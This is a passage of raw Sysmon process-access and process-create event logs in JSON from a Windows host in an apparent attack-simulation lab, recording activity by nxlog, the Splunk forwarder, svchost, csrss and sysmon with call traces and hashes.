(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.739","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.636\r\nProcessGuid: {E2A3D6B1-1072-5F25-0000-00108E1B0400}\r\nProcessId: 4084\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.636","ProcessGuid":"{E2A3D6B1-1072-5F25-0000-00108E1B0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.817\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1072-5F25-0000-00108E1B0400}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.817","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1072-5F25-0000-00108E1B0400}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1072-5F25-0000-00108E1B0400}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1072-5F25-0000-00108E1B0400}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:22.833","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:22.833\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 